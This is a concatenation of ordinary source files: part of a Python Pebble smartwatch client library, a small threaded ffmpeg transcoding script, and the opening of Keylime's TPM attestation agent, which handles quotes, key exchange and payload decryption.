log.warn("UUID removal failure, attempting to remove existing app by app name")
# attempt to remove an app by its name
apps = self.get_appbank_status()
for app in apps["apps"]:
if app["name"] == app_metadata['app_name']:
result_name = self.remove_app(app["id"], app["index"])
if endpoint_check(result_name, pbz_path):
return self.install_app(pbz_path, launch_on_install)
log.warn("Unable to locate previous instance of supplied application")
def reinstall_app_by_uuid(self, uuid, pbz_path):
"""
A convenience method to uninstall and install an app by UUID.
Must supply app UUID from source. ex: '54D3008F0E46462C995C0D0B4E01148C'
"""
self.remove_app_by_uuid(uuid)
self.install_app(pbz_path)
def install_app(self, pbz_path, launch_on_install=True):
"""
Install an app bundle (*.pbw) to the target Pebble.
This will pick the first free app-bank available.
"""
bundle = PebbleBundle(pbz_path)
if not bundle.is_app_bundle():
raise PebbleError(self.id, "This is not an app bundle")
app_metadata = bundle.get_app_metadata()
binary = bundle.zip.read(bundle.get_application_info()['name'])
if bundle.has_resources():
resources = bundle.zip.read(bundle.get_resources_info()['name'])
else:
resources = None
apps = self.get_appbank_status()
if not apps:
raise PebbleError(self.id, "could not obtain app list; try again")
first_free = 1
for app in apps["apps"]:
if app["index"] == first_free:
first_free += 1
if first_free == apps["banks"]:
raise PebbleError(self.id, "All %d app banks are full" % apps["banks"])
log.debug("Attempting to add app to bank %d of %d" % (first_free, apps["banks"]))
client = PutBytesClient(self, first_free, "BINARY", binary)
self.register_endpoint("PUTBYTES", client.handle_message)
client.init()
while not client._done and not client._error:
pass
if client._error:
raise PebbleError(self.id, "Failed to send application binary %s/pebble-app.bin" % pbz_path)
if resources:
client = PutBytesClient(self, first_free, "RESOURCES", resources)
self.register_endpoint("PUTBYTES", client.handle_message)
client.init()
while not client._done and not client._error:
pass
if client._error:
raise PebbleError(self.id, "Failed to send application resources %s/app_resources.pbpack" % pbz_path)
time.sleep(2)
self._add_app(first_free)
time.sleep(2)
if launch_on_install:
self.launcher_message(app_metadata['uuid'].bytes, "RUNNING", uuid_is_string=False)
def install_firmware(self, pbz_path, recovery=False):
"""Install a firmware bundle to the target watch."""
resources = None
with zipfile.ZipFile(pbz_path) as pbz:
binary = pbz.read("tintin_fw.bin")
if not recovery:
resources = pbz.read("system_resources.pbpack")
self.system_message("FIRMWARE_START")
time.sleep(2)
if resources:
client = PutBytesClient(self, 0, "SYS_RESOURCES", resources)
self.register_endpoint("PUTBYTES", client.handle_message)
client.init()
while not client._done and not client._error:
pass
if client._error:
raise PebbleError(self.id, "Failed to send firmware resources %s/system_resources.pbpack" % pbz_path)
client = PutBytesClient(self, 0, "RECOVERY" if recovery else "FIRMWARE", binary)
self.register_endpoint("PUTBYTES", client.handle_message)
client.init()
while not client._done and not client._error:
pass
if client._error:
raise PebbleError(self.id, "Failed to send firmware binary %s/tintin_fw.bin" % pbz_path)
self.system_message("FIRMWARE_COMPLETE")
def launcher_message(self, app_uuid, key_value, uuid_is_string = True, async = False):
""" send an appication message to launch or kill a specified application"""
launcher_keys = {
"RUN_STATE_KEY": 1,
}
launcher_key_values = {
"NOT_RUNNING": b'\x00',
"RUNNING": b'\x01'
}
if key_value not in launcher_key_values:
raise PebbleError(self.id, "not a valid application message")
if uuid_is_string:
app_uuid = app_uuid.decode('hex')
elif type(app_uuid) is uuid.UUID:
app_uuid = app_uuid.bytes
#else we can assume it's a byte array
# build and send a single tuple-sized launcher command
app_message_tuple = AppMessage.build_tuple(launcher_keys["RUN_STATE_KEY"], "UINT", launcher_key_values[key_value])
app_message_dict = AppMessage.build_dict(app_message_tuple)
packed_message = AppMessage.build_message(app_message_dict, "PUSH", app_uuid)
self._send_message("LAUNCHER", packed_message)
# wait for either ACK or NACK response
if not async:
return EndpointSync(self, "LAUNCHER").get_data()
def app_message_send_tuple(self, app_uuid, key, tuple_datatype, tuple_data):
""" Send a Dictionary with a single tuple to the app corresponding to UUID """
app_uuid = app_uuid.decode('hex')
app_message_tuple = AppMessage.build_tuple(key, tuple_datatype, tuple_data)
app_message_dict = AppMessage.build_dict(app_message_tuple)
packed_message = AppMessage.build_message(app_message_dict, "PUSH", app_uuid)
self._send_message("APPLICATION_MESSAGE", packed_message)
def app_message_send_string(self, app_uuid, key, string):
""" Send a Dictionary with a single tuple of type CSTRING to the app corresponding to UUID """
# NULL terminate and pack
string = string + '\0'
fmt = '<' + str(len(string)) + 's'
string = pack(fmt, string);
self.app_message_send_tuple(app_uuid, key, "CSTRING", string)
def app_message_send_uint(self, app_uuid, key, tuple_uint):
""" Send a Dictionary with a single tuple of type UINT to the app corresponding to UUID """
fmt = '<' + str(tuple_uint.bit_length() / 8 + 1) + 'B'
tuple_uint = pack(fmt, tuple_uint)
self.app_message_send_tuple(app_uuid, key, "UINT", tuple_uint)
def app_message_send_int(self, app_uuid, key, tuple_int):
""" Send a Dictionary with a single tuple of type INT to the app corresponding to UUID """
fmt = '<' + str(tuple_int.bit_length() / 8 + 1) + 'b'
tuple_int = pack(fmt, tuple_int)
self.app_message_send_tuple(app_uuid, key, "INT", tuple_int)
def app_message_send_byte_array(self, app_uuid, key, tuple_byte_array):
""" Send a Dictionary with a single tuple of type BYTE_ARRAY to the app corresponding to UUID """
# Already packed, fix endianness
tuple_byte_array = tuple_byte_array[::-1]
self.app_message_send_tuple(app_uuid, key, "BYTE_ARRAY", tuple_byte_array)
def system_message(self, command):
"""
Send a 'system message' to the watch.
These messages are used to signal important events/state-changes to the watch firmware.
"""
commands = {
"FIRMWARE_AVAILABLE": 0,
"FIRMWARE_START": 1,
"FIRMWARE_COMPLETE": 2,
"FIRMWARE_FAIL": 3,
"FIRMWARE_UP_TO_DATE": 4,
"FIRMWARE_OUT_OF_DATE": 5,
"BLUETOOTH_START_DISCOVERABLE": 6,
"BLUETOOTH_END_DISCOVERABLE": 7
}
if command not in commands:
raise PebbleError(self.id, "Invalid command \"%s\"" % command)
data = pack("!bb", 0, commands[command])
log.debug("Sending command %s (code %d)" % (command, commands[command]))
self._send_message("SYSTEM_MESSAGE", data)
def ping(self, cookie = 0xDEC0DE, async = False):
"""Send a 'ping' to the watch to test connectivity."""
data = pack("!bL", 0, cookie)
self._send_message("PING", data)
if not async:
return EndpointSync(self, "PING").get_data()
def reset(self):
"""Reset the watch remotely."""
self._send_message("RESET", "\x00")
def disconnect(self):
"""Disconnect from the target Pebble."""
self._alive = False
self._ser.close()
def _add_app(self, index):
data = pack("!bI", 3, index)
self._send_message("APP_MANAGER", data)
def _ping_response(self, endpoint, data):
restype, retcookie = unpack("!bL", data)
return retcookie
def _get_time_response(self, endpoint, data):
restype, timestamp = unpack("!bL", data)
return timestamp
def _system_message_response(self, endpoint, data):
if len(data) == 2:
log.info("Got system message %s" % repr(unpack('!bb', data)))
else:
log.info("Got 'unknown' system message...")
def _log_response(self, endpoint, data):
if (len(data) < 8):
log.warn("Unable to decode log message (length %d is less than 8)" % len(data))
return
timestamp, level, msgsize, linenumber = unpack("!IBBH", data[:8])
filename = data[8:24].decode('utf-8')
message = data[24:24+msgsize].decode('utf-8')
str_level = self.log_levels[level] if level in self.log_levels else "?"
print timestamp, str_level, filename, linenumber, message
def _app_log_response(self, endpoint, data):
if (len(data) < 8):
log.warn("Unable to decode log message (length %d is less than 8)" % len(data))
return
app_uuid = uuid.UUID(bytes=data[0:16])
timestamp, level, msgsize, linenumber = unpack("!IBBH", data[16:24])
filename = data[24:40].decode('utf-8')
message = data[40:40+msgsize].decode('utf-8')
str_level = self.log_levels[level] if level in self.log_levels else "?"
print timestamp, str_level, app_uuid, filename, linenumber, message
def _appbank_status_response(self, endpoint, data):
apps = {}
restype, = unpack("!b", data[0])
app_install_message = {
0: "app available",
1: "app removed",
2: "app updated"
}
if restype == 1:
apps["banks"], apps_installed = unpack("!II", data[1:9])
apps["apps"] = []
appinfo_size = 78
offset = 9
for i in xrange(apps_installed):
app = {}
try:
app["id"], app["index"], app["name"], app["company"], app["flags"], app["version"] = \
unpack("!II32s32sIH", data[offset:offset+appinfo_size])
app["name"] = app["name"].replace("\x00", "")
app["company"] = app["company"].replace("\x00", "")
apps["apps"] += [app]
except:
if offset+appinfo_size > len(data):
log.warn("Couldn't load bank %d; remaining data = %s" % (i,repr(data[offset:])))
else:
raise
offset += appinfo_size
return apps
elif restype == 2:
message_id = unpack("!I", data[1:])
message_id = int(''.join(map(str, message_id)))
return app_install_message[message_id]
def _version_response(self, endpoint, data):
fw_names = {
0: "normal_fw",
1: "recovery_fw"
}
resp = {}
for i in xrange(2):
fwver_size = 47
offset = i*fwver_size+1
fw = {}
fw["timestamp"],fw["version"],fw["commit"],fw["is_recovery"], \
fw["hardware_platform"],fw["metadata_ver"] = \
unpack("!i32s8s?bb", data[offset:offset+fwver_size])
fw["version"] = fw["version"].replace("\x00", "")
fw["commit"] = fw["commit"].replace("\x00", "")
fw_name = fw_names[i]
resp[fw_name] = fw
resp["bootloader_timestamp"],resp["hw_version"],resp["serial"] = \
unpack("!L9s12s", data[95:120])
resp["hw_version"] = resp["hw_version"].replace("\x00","")
btmac_hex = binascii.hexlify(data[120:126])
resp["btmac"] = ":".join([btmac_hex[i:i+2].upper() for i in reversed(xrange(0, 12, 2))])
return resp
def install_bridge(self, bridge):
assert "process" in dir(bridge) #TODO: Proper parentage check
self.bridges[bridge.UUID] = bridge(self)
log.info("Installed %s as a bridge on UUID %s" % (bridge, bridge.UUID))
def _application_message_response(self, endpoint, data):
command = data[0]
if command == b'\x01': #PUSH
(command, transaction, app_uuid, msg_dict) = AppMessage.read_message(data)
log.debug("ACKing transaction %x" % ord(transaction))
self._send_message("APPLICATION_MESSAGE", "\xFF%s" % transaction)
if app_uuid in self.bridges:
reply = self.bridges[app_uuid].process(msg_dict)
if reply is not None:
msg = AppMessage.construct_message(reply, "PUSH", app_uuid.bytes, transaction)
self._send_message("APPLICATION_MESSAGE", msg)
else:
log.warn("Got app message for %s and no bridge was found" % app_uuid)
elif command == b'\x02': #REQUEST:
log.warn("Got app request; not yet implemented; NACKing")
transaction = data[1]
self._send_message("APPLICATION_MESSAGE", "\x7F%s" % transaction)
elif command == b'\x7F': #NACK
transaction = data[1]
log.warn("Pebble NACKed transaction %x" % ord(transaction))
elif command == b'\xFF': #ACK
transaction = data[1]
log.debug("Pebble ACKed transaction %x" % ord(transaction))
else:
log.error("Unknown command type %x" % ord(command))
#TODO: Old, untouched, code. Remove?
if len(data) > 1:
rest = data[1:]
else:
rest = ''
if data[0] in AppMessage.app_messages:
return AppMessage.app_messages[data[0]] + rest
def _phone_version_response(self, endpoint, data):
session_cap = {
"GAMMA_RAY" : 0x80000000,
}
remote_cap = {
"TELEPHONY" : 16,
"SMS" : 32,
"GPS" : 64,
"BTLE" : 128,
"CAMERA_REAR" : 256,
"ACCEL" : 512,
"GYRO" : 1024,
"COMPASS" : 2048,
}
os = {
"UNKNOWN" : 0,
"IOS" : 1,
"ANDROID" : 2,
"OSX" : 3,
"LINUX" : 4,
"WINDOWS" : 5,
}
# Then session capabilities, android adds GAMMA_RAY and it's
# the only session flag so far
session = session_cap["GAMMA_RAY"]
# Then phone capabilities, android app adds TELEPHONY and SMS,
# and the phone type (we know android works for now)
remote = remote_cap["TELEPHONY"] | remote_cap["SMS"] | os["ANDROID"]
msg = pack("!biII", 1, -1, session, remote)
self._send_message("PHONE_VERSION", msg);
def _music_control_response(self, endpoint, data):
event, = unpack("!b", data)
event_names = {
1: "PLAYPAUSE",
4: "NEXT",
5: "PREVIOUS",
}
return event_names[event] if event in event_names else None
class AppMessage(object):
# tools to build a valid app message
#TODO: Refactor this in to a clean object representation instead of static utility functions.
tuple_datatypes = {
"BYTE_ARRAY": b'\x00',
"CSTRING": b'\x01',
"UINT": b'\x02',
"INT": b'\x03'
}
struct_to_tuple_type = {
'P':'BYTE_ARRAY',
's':'CSTRING',
'b':'INT',
'h':'INT',
'i':'INT',
'q':'INT',
'B':'UINT',
'H':'UINT',
'I':'UINT',
'Q':'UINT',
}
app_messages = {
"PUSH": b'\x01',
"REQUEST": b'\x02',
"ACK": b'\xFF',
"NACK": b'\x7F'
}
def read_byte_array(v_type, v_len, data):
return (array.array('B',data), "%sP" % v_len)
def read_cstring(v_type, v_len, data):
#TODO: This seems kludgy.
n = data.find("\x00")
if n != -1:
data = data[:n]
return (data, "%ss" % v_len)
def read_uint(v_type, v_len, data):
types = {
1:"B",
2:"H",
4:"I",
8:"Q"
}
return (unpack("<%s" % types[v_len], data)[0], types[v_len])
def read_int(v_type, v_len, data):
types = {
1:"b",
2:"h",
4:"i",
8:"q"
}
return (unpack("<%s" % types[v_len], data)[0], types[v_len])
tuple_readers = {
0:read_byte_array,
1:read_cstring,
2:read_uint,
3:read_int
}
@staticmethod
def read_dict(data):
count = ord(data[0])
data = data[1:]
tuples = []
while len(data):
(k,t,l) = unpack("<LBH", data[0:7])
v = data[7:7+l]
p = AppMessage.tuple_readers[t](t,l,v)
tuples.append((k,p))
data = data[7+l:]
return OrderedDict(tuples)
@staticmethod
def read_message(data):
return (data[0], data[1], uuid.UUID(bytes=data[2:18]), AppMessage.read_dict(data[18:]))
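# Illustrative summary (added): as read by the two methods above, an app message
# payload is laid out as
#   [command:1][transaction_id:1][uuid:16][tuple_count:1]
#   then, per tuple: [key:4 little-endian][type:1][length:2 little-endian][data:length]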
#NOTE: The "construct" methods should replace the "build" methods at some point.
@staticmethod
def construct_tuple(key, data_type, data):
t = array.array('B')
t.fromstring(pack('<L', key))
t.fromstring(AppMessage.tuple_datatypes[data_type])
t.fromstring(pack("<H", len(data)))
t.fromstring(data)
return t
@staticmethod
def construct_dict(tuples):
count = len(tuples)
out = array.array('B')
out.fromstring(pack('<B', count))
#TODO: Re-solve this using byte arrays
for v in tuples:
out.extend(v)
return out
@staticmethod
def construct_message(packed_dict, command, uuid, transaction_id):
m = array.array('B')
m.fromstring(AppMessage.app_messages[command])
m.fromstring(transaction_id)
m.fromstring(uuid)
m.extend(packed_dict)
return m.tostring()
@staticmethod
def build_tuple(key, data_type, data):
""" make a single app_message tuple"""
# available app message datatypes:
# build the message_tuple
app_message_tuple = OrderedDict([
("KEY", pack('<L', key)),
("TYPE", AppMessage.tuple_datatypes[data_type]),
("LENGTH", pack('<H', len(data))),
("DATA", data)
])
return app_message_tuple
@staticmethod
def build_dict(tuple_of_tuples):
""" make a dictionary from a list of app_message tuples"""
# note that "TUPLE" can refer to 0 or more tuples. Tuples must be correct endian-ness already
tuple_count = len(tuple_of_tuples)
# make the bytearray from the flattened tuples
tuple_total_bytes = ''.join(item for item in itertools.chain(*tuple_of_tuples.values()))
# now build the dict
app_message_dict = OrderedDict([
("TUPLECOUNT", pack('B', tuple_count)),
("TUPLE", tuple_total_bytes)
])
return app_message_dict
@staticmethod
def build_message(dict_of_tuples, command, uuid, transaction_id=b'\x00'):
""" build the app_message intended for app with matching uuid"""
# NOTE: uuid must be a byte array
# finally build the entire message
app_message = OrderedDict([
("COMMAND", AppMessage.app_messages[command]),
("TRANSACTIONID", transaction_id),
("UUID", uuid),
("DICT", ''.join(dict_of_tuples.values()))
])
return ''.join(app_message.values())
class PutBytesClient(object):
states = {
"NOT_STARTED": 0,
"WAIT_FOR_TOKEN": 1,
"IN_PROGRESS": 2,
"COMMIT": 3,
"COMPLETE": 4,
"FAILED": 5
}
transfer_types = {
"FIRMWARE": 1,
"RECOVERY": 2,
"SYS_RESOURCES": 3,
"RESOURCES": 4,
"BINARY": 5
}
def __init__(self, pebble, index, transfer_type, buffer):
self._pebble = pebble
self._state = self.states["NOT_STARTED"]
self._transfer_type = self.transfer_types[transfer_type]
self._buffer = buffer
self._index = index
self._done = False
self._error = False
def init(self):
data = pack("!bIbb", 1, len(self._buffer), self._transfer_type, self._index)
self._pebble._send_message("PUTBYTES", data)
self._state = self.states["WAIT_FOR_TOKEN"]
def wait_for_token(self, resp):
res, = unpack("!b", resp[0])
if res != 1:
log.error("init failed with code %d" % res)
self._error = True
return
self._token, = unpack("!I", resp[1:])
self._left = len(self._buffer)
self._state = self.states["IN_PROGRESS"]
self.send()
def in_progress(self, resp):
res, = unpack("!b", resp[0])
if res != 1:
self.abort()
return
if self._left > 0:
self.send()
log.debug("Sent %d of %d bytes" % (len(self._buffer)-self._left, len(self._buffer)))
else:
self._state = self.states["COMMIT"]
self.commit()
def commit(self):
data = pack("!bII", 3, self._token & 0xFFFFFFFF, stm32_crc.crc32(self._buffer))
self._pebble._send_message("PUTBYTES", data)
def handle_commit(self, resp):
res, = unpack("!b", resp[0])
if res != 1:
self.abort()
return
self._state = self.states["COMPLETE"]
self.complete()
def complete(self):
data = pack("!bI", 5, self._token & 0xFFFFFFFF)
self._pebble._send_message("PUTBYTES", data)
def handle_complete(self, resp):
res, = unpack("!b", resp[0])
if res != 1:
self.abort()
return
self._done = True
def abort(self):
msgdata = pack("!bI", 4, self._token & 0xFFFFFFFF)
self._pebble._send_message("PUTBYTES", msgdata)
self._error = True
def send(self):
datalen = min(self._left, 2000)
rg = len(self._buffer)-self._left
msgdata = pack("!bII", 2, self._token & 0xFFFFFFFF, datalen)
msgdata += self._buffer[rg:rg+datalen]
self._pebble._send_message("PUTBYTES", msgdata)
self._left -= datalen
def handle_message(self, endpoint, resp):
if self._state == self.states["WAIT_FOR_TOKEN"]:
self.wait_for_token(resp)
elif self._state == self.states["IN_PROGRESS"]:
self.in_progress(resp)
elif self._state == self.states["COMMIT"]:
self.handle_commit(resp)
elif self._state == self.states["COMPLETE"]:
self.handle_complete(resp)
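# Illustrative driver sketch (added), mirroring how Pebble.install_app above
# drives the PUTBYTES state machine: NOT_STARTED -> WAIT_FOR_TOKEN -> IN_PROGRESS
# (chunks of up to 2000 bytes) -> COMMIT (CRC) -> COMPLETE; any non-1 response
# code aborts the transfer and sets _error.
#
# client = PutBytesClient(pebble, first_free, "BINARY", binary)
# pebble.register_endpoint("PUTBYTES", client.handle_message)
# client.init()
# while not client._done and not client._error:
#     pass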
|
test_main.py
|
import shutil
import subprocess
import threading
import sys
CMD = 'ffmpeg -y -i {input} -b:v {bit_rate}M -r {fps} -s hd{res} {output}'
def check_ffmpeg():
FFMPEG = shutil.which('ffmpeg')
if not FFMPEG:
raise FileNotFoundError('FFMPEG not found')
def test_func():
main("video.mp4")
def ffmpeg(name, res):
output_name = str(res)+"output.mp4"
cmd = reformat(name, res, output_name)
subprocess.run(cmd.split())  # pass an argument list so the command runs without shell=True
def reformat(name, res, output_name):
cmd = CMD.format(input=name,
bit_rate=30,
fps=60,
res=res,
output=output_name)
return cmd
def main(args):
check_ffmpeg()
if args:
input_name = args
elif len(sys.argv) != 2:
raise FileNotFoundError('You did not enter the file name')
else:
input_name = sys.argv[1]
ffmpeg480 = threading.Thread(target=ffmpeg, args=(input_name, 480))
ffmpeg720 = threading.Thread(target=ffmpeg, args=(input_name, 720))
ffmpeg480.start()
ffmpeg720.start()
print("Start transcoding to 480P and 720P videos.")
ffmpeg480.join()
ffmpeg720.join()
print("All jobs done.")
if __name__ == "__main__":
main("video.mp4")
|
keylime_agent.py
|
#!/usr/bin/python3
'''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
'''
import asyncio
import http.server
import multiprocessing
import platform
import datetime
import signal
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import threading
import base64
import configparser
import uuid
import os
import socket
import sys
import time
import hashlib
import zipfile
import io
import importlib
import shutil
import subprocess
import psutil
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from keylime import config
from keylime import keylime_logging
from keylime import cmd_exec
from keylime import crypto
from keylime import fs_util
from keylime import ima
from keylime import json
from keylime import revocation_notifier
from keylime import registrar_client
from keylime import secure_mount
from keylime import user_utils
from keylime import web_util
from keylime import api_version as keylime_api_version
from keylime.common import algorithms, validators
from keylime.tpm.tpm_main import tpm
from keylime.tpm.tpm_abstract import TPM_Utilities
from keylime.tpm.tpm2_objects import pubkey_from_tpm2b_public
# Configure logger
logger = keylime_logging.init_logging('cloudagent')
# lock required for multithreaded operation
uvLock = threading.Lock()
# Instantiate tpm
tpm_instance = tpm(need_hw_tpm=True)
class Handler(BaseHTTPRequestHandler):
parsed_path = ''
def do_HEAD(self):
"""Not supported"""
web_util.echo_json_response(self, 405, "HEAD not supported")
def do_GET(self):
"""This method services the GET request typically from either the Tenant or the Cloud Verifier.
Only tenant and cloudverifier URIs are supported. Both requests require a nonce parameter.
The Cloud Verifier requires an additional mask parameter. If the URI or parameters are incorrect, a 400 response is returned.
"""
logger.info('GET invoked from %s with uri: %s', self.client_address, self.path)
rest_params = web_util.get_restful_params(self.path)
if rest_params is None:
web_util.echo_json_response(
self, 405, "Not Implemented: Use /version, /keys/ or /quotes/ interfaces")
return
if "version" in rest_params:
version_info = {
"supported_version": keylime_api_version.current_version()
}
web_util.echo_json_response(self, 200, "Success", version_info)
return
if not rest_params["api_version"]:
web_util.echo_json_response(self, 400, "API Version not supported")
return
if "keys" in rest_params and rest_params['keys'] == 'verify':
if self.server.K is None:
logger.info('GET key challenge returning 400 response. bootstrap key not available')
web_util.echo_json_response(
self, 400, "Bootstrap key not yet available.")
return
if "challenge" not in rest_params:
logger.info('GET key challenge returning 400 response. No challenge provided')
web_util.echo_json_response(
self, 400, "No challenge provided.")
return
challenge = rest_params['challenge']
response = {}
response['hmac'] = crypto.do_hmac(self.server.K, challenge)
web_util.echo_json_response(self, 200, "Success", response)
logger.info('GET key challenge returning 200 response.')
# If agent pubkey requested
elif "keys" in rest_params and rest_params["keys"] == "pubkey":
response = {}
response['pubkey'] = self.server.rsapublickey_exportable
web_util.echo_json_response(self, 200, "Success", response)
logger.info('GET pubkey returning 200 response.')
return
elif "quotes" in rest_params:
nonce = rest_params.get('nonce', None)
pcrmask = rest_params.get('mask', None)
ima_ml_entry = rest_params.get('ima_ml_entry', '0')
# if the query is not messed up
if nonce is None:
logger.warning('GET quote returning 400 response. nonce not provided as an HTTP parameter in request')
web_util.echo_json_response(
self, 400, "nonce not provided as an HTTP parameter in request")
return
# Sanitization assurance (for tpm.run() tasks below)
if not (nonce.isalnum() and
(pcrmask is None or validators.valid_hex(pcrmask)) and
ima_ml_entry.isalnum()):
logger.warning('GET quote returning 400 response. parameters should be strictly alphanumeric')
web_util.echo_json_response(
self, 400, "parameters should be strictly alphanumeric")
return
if len(nonce) > tpm_instance.MAX_NONCE_SIZE:
logger.warning('GET quote returning 400 response. Nonce is too long (max size %i): %i',
tpm_instance.MAX_NONCE_SIZE, len(nonce))
web_util.echo_json_response(
self, 400, f'Nonce is too long (max size {tpm_instance.MAX_NONCE_SIZE}): {len(nonce)}')
return
# identity quotes are always shallow
hash_alg = tpm_instance.defaults['hash']
if not tpm_instance.is_vtpm() or rest_params["quotes"] == 'identity':
quote = tpm_instance.create_quote(
nonce, self.server.rsapublickey_exportable, pcrmask, hash_alg)
imaMask = pcrmask
# Allow for a partial quote response (without pubkey)
enc_alg = tpm_instance.defaults['encrypt']
sign_alg = tpm_instance.defaults['sign']
if "partial" in rest_params and (rest_params["partial"] is None or rest_params["partial"] == "1"):
response = {
'quote': quote,
'hash_alg': hash_alg,
'enc_alg': enc_alg,
'sign_alg': sign_alg,
}
else:
response = {
'quote': quote,
'hash_alg': hash_alg,
'enc_alg': enc_alg,
'sign_alg': sign_alg,
'pubkey': self.server.rsapublickey_exportable,
}
response['boottime'] = self.server.boottime
# return a measurement list if available
if TPM_Utilities.check_mask(imaMask, config.IMA_PCR):
ima_ml_entry = int(ima_ml_entry)
if ima_ml_entry > self.server.next_ima_ml_entry:
ima_ml_entry = 0
ml, nth_entry, num_entries = ima.read_measurement_list(self.server.ima_log_file, ima_ml_entry)
if num_entries > 0:
response['ima_measurement_list'] = ml
response['ima_measurement_list_entry'] = nth_entry
self.server.next_ima_ml_entry = num_entries
# similar to how IMA log retrievals are triggered by IMA_PCR, we trigger boot logs with MEASUREDBOOT_PCRs
# other possibilities would include adding additional data to rest_params to trigger boot log retrievals
# generally speaking, retrieving the 15Kbytes of a boot log does not seem significant compared to the
# potential Mbytes of an IMA measurement list.
if TPM_Utilities.check_mask(imaMask, config.MEASUREDBOOT_PCRS[0]):
if not self.server.tpm_log_file_data:
logger.warning("TPM2 event log not available: %s", config.MEASUREDBOOT_ML)
else:
response['mb_measurement_list'] = self.server.tpm_log_file_data
web_util.echo_json_response(self, 200, "Success", response)
logger.info('GET %s quote returning 200 response.', rest_params["quotes"])
return
else:
logger.warning('GET returning 400 response. uri not supported: %s', self.path)
web_util.echo_json_response(self, 400, "uri not supported")
return
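    # Illustrative sketch only (not part of the original handler): a verifier-style
    # quote request against do_GET above looks roughly like
    #
    #   GET /v<api_version>/quotes/integrity?nonce=<alnum>&mask=<hex PCR mask>&ima_ml_entry=0
    #
    # while a tenant-style identity quote omits the mask:
    #
    #   GET /v<api_version>/quotes/identity?nonce=<alnum>
    #
    # The exact path prefix depends on the API version advertised via /version.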
def do_POST(self):
"""This method services the POST request typically from either the Tenant or the Cloud Verifier.
        Only the /keys/ukey and /keys/vkey URIs are supported. The Tenant POSTs the U key (with an auth_tag and optional payload),
        and the Cloud Verifier POSTs the V key. If the URI or parameters are incorrect, a 400 response is returned.
"""
rest_params = web_util.get_restful_params(self.path)
if rest_params is None:
web_util.echo_json_response(
self, 405, "Not Implemented: Use /keys/ interface")
return
if not rest_params["api_version"]:
web_util.echo_json_response(self, 400, "API Version not supported")
return
if rest_params.get("keys", None) not in ["ukey", "vkey"]:
web_util.echo_json_response(self, 400, "Only /keys/ukey or /keys/vkey are supported")
return
content_length = int(self.headers.get('Content-Length', 0))
if content_length <= 0:
logger.warning('POST returning 400 response, expected content in message. url: %s', self.path)
web_util.echo_json_response(self, 400, "expected content in message")
return
post_body = self.rfile.read(content_length)
try:
json_body = json.loads(post_body)
b64_encrypted_key = json_body['encrypted_key']
decrypted_key = crypto.rsa_decrypt(
self.server.rsaprivatekey, base64.b64decode(b64_encrypted_key))
except (ValueError, KeyError, TypeError) as e:
logger.warning('POST returning 400 response, could not parse body data: %s', e)
web_util.echo_json_response(self, 400, "content is invalid")
return
have_derived_key = False
if rest_params["keys"] == "ukey":
if 'auth_tag' not in json_body:
logger.warning('POST returning 400 response, U key provided without an auth_tag')
web_util.echo_json_response(self, 400, "auth_tag is missing")
return
self.server.add_U(decrypted_key)
self.server.auth_tag = json_body['auth_tag']
self.server.payload = json_body.get('payload', None)
have_derived_key = self.server.attempt_decryption()
elif rest_params["keys"] == "vkey":
self.server.add_V(decrypted_key)
have_derived_key = self.server.attempt_decryption()
else:
            logger.warning('POST returning 400 response. uri not supported: %s', self.path)
web_util.echo_json_response(self, 400, "uri not supported")
return
logger.info('POST of %s key returning 200', ('V', 'U')[rest_params["keys"] == "ukey"])
web_util.echo_json_response(self, 200, "Success")
# no key yet, then we're done
if not have_derived_key:
return
# woo hoo we have a key
# ok lets write out the key now
secdir = secure_mount.mount() # confirm that storage is still securely mounted
# clean out the secure dir of any previous info before we extract files
if os.path.isdir(os.path.join(secdir, "unzipped")):
shutil.rmtree(os.path.join(secdir, "unzipped"))
# write out key file
        with open(os.path.join(secdir, self.server.enc_keyname), 'w', encoding="utf-8") as f:
            f.write(base64.b64encode(self.server.K).decode())
# stow the U value for later
tpm_instance.write_key_nvram(self.server.final_U)
        # optionally extend a hash of the key and payload into a specified PCR
tomeasure = self.server.K
# if we have a good key, now attempt to write out the encrypted payload
dec_path = os.path.join(secdir,
config.get('cloud_agent', "dec_payload_file"))
enc_path = os.path.join(config.WORK_DIR, "encrypted_payload")
dec_payload = None
enc_payload = None
if self.server.payload is not None:
if (not self.server.mtls_cert_enabled and
not config.getboolean('cloud_agent', 'enable_insecure_payload', fallback=False)):
logger.warning('agent mTLS is disabled, and unless "enable_insecure_payload" is set to "True", payloads cannot be deployed')
enc_payload = None
else:
dec_payload = crypto.decrypt(
self.server.payload, bytes(self.server.K))
enc_payload = self.server.payload
elif os.path.exists(enc_path):
# if no payload provided, try to decrypt one from a previous run stored in encrypted_payload
with open(enc_path, 'rb') as f:
enc_payload = f.read()
try:
dec_payload = crypto.decrypt(enc_payload, self.server.K)
logger.info("Decrypted previous payload in %s to %s", enc_path, dec_path)
except Exception as e:
logger.warning("Unable to decrypt previous payload %s with derived key: %s", enc_path, e)
os.remove(enc_path)
enc_payload = None
        # also write out the encrypted payload so it can be decrypted again on the next run
        if enc_payload is not None:
            with open(enc_path, 'wb') as f:
                # enc_payload is a str when freshly POSTed and bytes when re-read from disk above
                f.write(enc_payload if isinstance(enc_payload, bytes) else enc_payload.encode('utf-8'))
# deal with payload
payload_thread = None
if dec_payload is not None:
tomeasure = tomeasure + dec_payload
# see if payload is a zip
zfio = io.BytesIO(dec_payload)
if config.getboolean('cloud_agent', 'extract_payload_zip') and zipfile.is_zipfile(zfio):
logger.info("Decrypting and unzipping payload to %s/unzipped", secdir)
                with zipfile.ZipFile(zfio, 'r') as f:
f.extractall(os.path.join(secdir, "unzipped"))
# run an included script if one has been provided
initscript = config.get('cloud_agent', 'payload_script')
if initscript != "":
def initthread():
env = os.environ.copy()
env['AGENT_UUID'] = self.server.agent_uuid
proc = subprocess.Popen(["/bin/bash", initscript], env=env, shell=False,
cwd=os.path.join(secdir, "unzipped"),
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for line in iter(proc.stdout.readline, b''):
logger.debug("init-output: %s", line.strip())
                        # stdout has already been drained by the loop above; wait() just reaps the finished process
proc.wait()
if not os.path.exists(
os.path.join(secdir, "unzipped", initscript)):
logger.info("No payload script %s found in %s/unzipped", initscript, secdir)
else:
logger.info("Executing payload script: %s/unzipped/%s", secdir, initscript)
payload_thread = threading.Thread(target=initthread, daemon=True)
else:
logger.info("Decrypting payload to %s", dec_path)
with open(dec_path, 'wb') as f:
f.write(dec_payload)
zfio.close()
